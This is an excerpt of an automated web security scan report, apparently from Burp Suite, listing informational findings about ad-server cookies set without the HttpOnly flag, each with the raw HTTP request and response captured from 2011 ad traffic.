document.write(unescape('%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%20%20rsi_pub%20%3D%20%27945CC0CF6F6B
...[SNIP]...

12.227. http://tag.admeld.com/ad/js/221/tmz/300x250/ros_inpage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/js/221/tmz/300x250/ros_inpage

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/221/tmz/300x250/ros_inpage?t=1316239112322&tz=300&m=2&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fjustin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone%2F%3Fadid%3Dhero1&refer=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F02%2Fncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/?adid=hero1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 632
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 01:01:07 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com


document.write("<div style='width:300px,height:250px;margin:0;border:0'>");


document.write(unescape('%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%20%20rsi_pub%20%3D%20%27945CC0CF6F6B
...[SNIP]...

12.228. http://tag.admeld.com/ad/js/221/tmz/300x250/toofab_ros  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/js/221/tmz/300x250/toofab_ros

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/221/tmz/300x250/toofab_ros?t=1316238721041&tz=300&m=2&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.toofab.com%2F&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 632
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 00:50:36 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com


document.write("<div style='width:300px,height:250px;margin:0;border:0'>");


document.write(unescape('%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%20%20rsi_pub%20%3D%20%27945CC0CF6F6B
...[SNIP]...

12.229. http://tag.admeld.com/ad/js/221/tmz/728x90/homepage_atf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/js/221/tmz/728x90/homepage_atf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/221/tmz/728x90/homepage_atf?t=1316238803749&tz=300&m=2&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.tmz.com%2F&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 626
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 00:51:59 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com


document.write("<div style='width:728px,height:90px;margin:0;border:0'>");


document.write(unescape('%3Cscript%20type%3D%22text%2Fjavascript%22%3E%3C%21--%0Agoogle_ad_client%20%3D%20%22pu
...[SNIP]...

12.230. http://tag.admeld.com/ad/js/221/tmz/728x90/ros  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/js/221/tmz/728x90/ros

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/221/tmz/728x90/ros?t=1316239020068&tz=300&m=2&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers%2F%3Fadid%3Dhero2&refer=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fnancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/?adid=hero2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 626
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 00:55:34 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com


document.write("<div style='width:728px,height:90px;margin:0;border:0'>");


document.write(unescape('%3Cscript%20type%3D%22text%2Fjavascript%22%3E%3C%21--%0Agoogle_ad_client%20%3D%20%22pu
...[SNIP]...

12.231. http://tag.admeld.com/ad/js/221/tmz/728x90/toofab_ros  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/js/221/tmz/728x90/toofab_ros

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/221/tmz/728x90/toofab_ros?t=1316238718113&tz=300&m=2&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.toofab.com%2F&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 626
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 00:50:34 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com


document.write("<div style='width:728px,height:90px;margin:0;border:0'>");


document.write(unescape('%3Cscript%20type%3D%22text%2Fjavascript%22%3E%3C%21--%0Agoogle_ad_client%20%3D%20%22pu
...[SNIP]...

12.232. http://tag.admeld.com/ad/js/610/unified/300x250/bh_656864_29757991  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/js/610/unified/300x250/bh_656864_29757991

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/610/unified/300x250/bh_656864_29757991?t=1316239352371&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fcolumnists%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 821
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 01:16:33 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com


document.write("<div style='width:300px,height:250px;margin:0;border:0'>");


document.write(unescape('%3C%21--%20begin%20Undertone%20Ad%20Tag%20for%20INT894Q-Unified-Tier1%20-%20Medium%20
...[SNIP]...

12.233. http://tag.admeld.com/match  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /match

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /match?admeld_adprovider_id=24&external_user_id=2944787775510337379 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2944787775510337379&mktid=&mpid=&fpid=4&rnd=3354925442677492794&nu=n&sp=y&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 35
Content-Type: image/gif
Date: Sat, 17 Sep 2011 00:52:01 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

GIF89a.......,.................D..;

12.234. http://tag.admeld.com/passback/iframe/221/tmz/300x250/6/meld.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /passback/iframe/221/tmz/300x250/6/meld.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /passback/iframe/221/tmz/300x250/6/meld.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 683
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:01:25 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...

12.235. http://tag.admeld.com/passback/iframe/221/tmz/728x90/6/meld.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /passback/iframe/221/tmz/728x90/6/meld.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /passback/iframe/221/tmz/728x90/6/meld.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 987
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:01:03 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:728px;height:90px;margin:0;border:0">



...[SNIP]...

12.236. http://tag.admeld.com/passback/js/221/tmz/300x250/28/meld.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /passback/js/221/tmz/300x250/28/meld.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /passback/js/221/tmz/300x250/28/meld.js HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/passback/iframe/221/tmz/300x250/6/meld.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 448
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 00:57:13 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com


document.write("<div style='width:300px,height:250px;margin:0;border:0'>");


document.write(unescape('%3Cscript%20type%3D%27text%2Fjavascript%27%3E%0Avar%20ACE_AR%20%3D%20%7Bsite%3A%20%27
...[SNIP]...

12.237. http://tag.admeld.com/passback/js/221/tmz/300x250/49/meld.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /passback/js/221/tmz/300x250/49/meld.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /passback/js/221/tmz/300x250/49/meld.js HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?QGoAAJMQIwBQUEQAAAAAADwgEgAAAAAAAgAQAAIAAAAAAP8AAAAGFEz4GAAAAAAATvgYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD1DhMAAAAAAAIAAgAAAAAAmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB28HEx7NS8CmV5AsOiKv7-9qNiEv6o406fPd8cAAAAAA==,,http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fjustin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone%2F%3Fadid%3Dhero1,Z%3D300x250%26_salt%3D1957428050%26anmember%3D514%26anprice%3D%26r%3D1%26s%3D2298003,fc95296e-e0c7-11e0-b013-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 448
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 00:57:17 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com


document.write("<div style='width:300px,height:250px;margin:0;border:0'>");


document.write(unescape('%3Cscript%20type%3D%27text%2Fjavascript%27%3E%0Avar%20ACE_AR%20%3D%20%7Bsite%3A%20%27
...[SNIP]...

12.238. http://tag.admeld.com/passback/js/221/tmz/728x90/28/meld.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /passback/js/221/tmz/728x90/28/meld.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /passback/js/221/tmz/728x90/28/meld.js HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/passback/iframe/221/tmz/728x90/6/meld.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 626
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 00:57:08 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com


document.write("<div style='width:728px,height:90px;margin:0;border:0'>");


document.write(unescape('%3Cscript%20type%3D%22text%2Fjavascript%22%3E%3C%21--%0Agoogle_ad_client%20%3D%20%22pu
...[SNIP]...

12.239. http://tag.admeld.com/passback/js/221/tmz/728x90/49/meld.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /passback/js/221/tmz/728x90/49/meld.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /passback/js/221/tmz/728x90/49/meld.js HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?wT8nBZMQIwBWUEQAAAAAAEAgEgAAAAAAAgAAAAYAAAAAAP8AAAAGFEz4GAAAAAAAUvgYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD1DhMAAAAAAAIAAgAAAAAAmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMCYyQztO8ClmeR2rwo8Ab3j-oNvoGtMiyJOdrAAAAAA==,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F221%2Ftmz%2F728x90%2Fhomepage_btf%3Ft%3D1316238825238,Z%3D728x90%26_salt%3D2029454794%26anmember%3D514%26anprice%3D%26fo%3D%26hp%3D0%26ht%3Djs%26hu%3D%26m%3D0%26r%3D0%26refer%3D%26s%3D2298003%26tz%3D300%26url%3Dhttp%253A%252F%252Fwww.tmz.com%252F,5257a1a2-e0c7-11e0-91e5-78e7d15f7c8c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 450
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 00:52:33 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com


document.write("<div style='width:728px,height:90px;margin:0;border:0'>");


document.write(unescape('%3Cscript%20type%3D%27text%2Fjavascript%27%3E%0Avar%20ACE_AR%20%3D%20%7Bsite%3A%20%278
...[SNIP]...

12.240. http://tag.admeld.com/passback/js/610/unified/300x250/8/meld.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /passback/js/610/unified/300x250/8/meld.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /passback/js/610/unified/300x250/8/meld.js HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239296793&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DMiddle1%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Fnews%252Fhome&refer=http%3A%2F%2Fwww.bostonherald.com%2Fnews%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 821
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 01:00:12 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com


document.write("<div style='width:300px,height:250px;margin:0;border:0'>");


document.write(unescape('%3C%21--%20begin%20Undertone%20Ad%20Tag%20for%20INT894Q-Unified-Tier1%20-%20Medium%20
...[SNIP]...

12.241. http://tag.contextweb.com/TagPublish/GetAd.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DMiddle1%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Fnews%252Fhome&cwr=&mrnd=26611780&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239296793&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DMiddle1%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Fnews%252Fhome&refer=http%3A%2F%2Fwww.bostonherald.com%2Fnews%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP203
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/120
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 1960
Date: Sat, 17 Sep 2011 01:10:33 GMT
Connection: close
Set-Cookie: 538518_3_106142_-1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: 538518_3_106142_-1=1316221833011; Domain=.contextweb.com; Path=/
Set-Cookie: vf=2; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:01 GMT; Path=/

document.write(decodeURIComponent("%3Cscript%20src%3D%22http%3A%2F%2Ftag.admeld.com%2Fpassback%2Fjs%2F610%2Funified%2F300x250%2F8%2Fmeld.js%22%3E%3C%2Fscript%3E%3Cdiv%20style%3D%22display%3Anone%3Bwid
...[SNIP]...

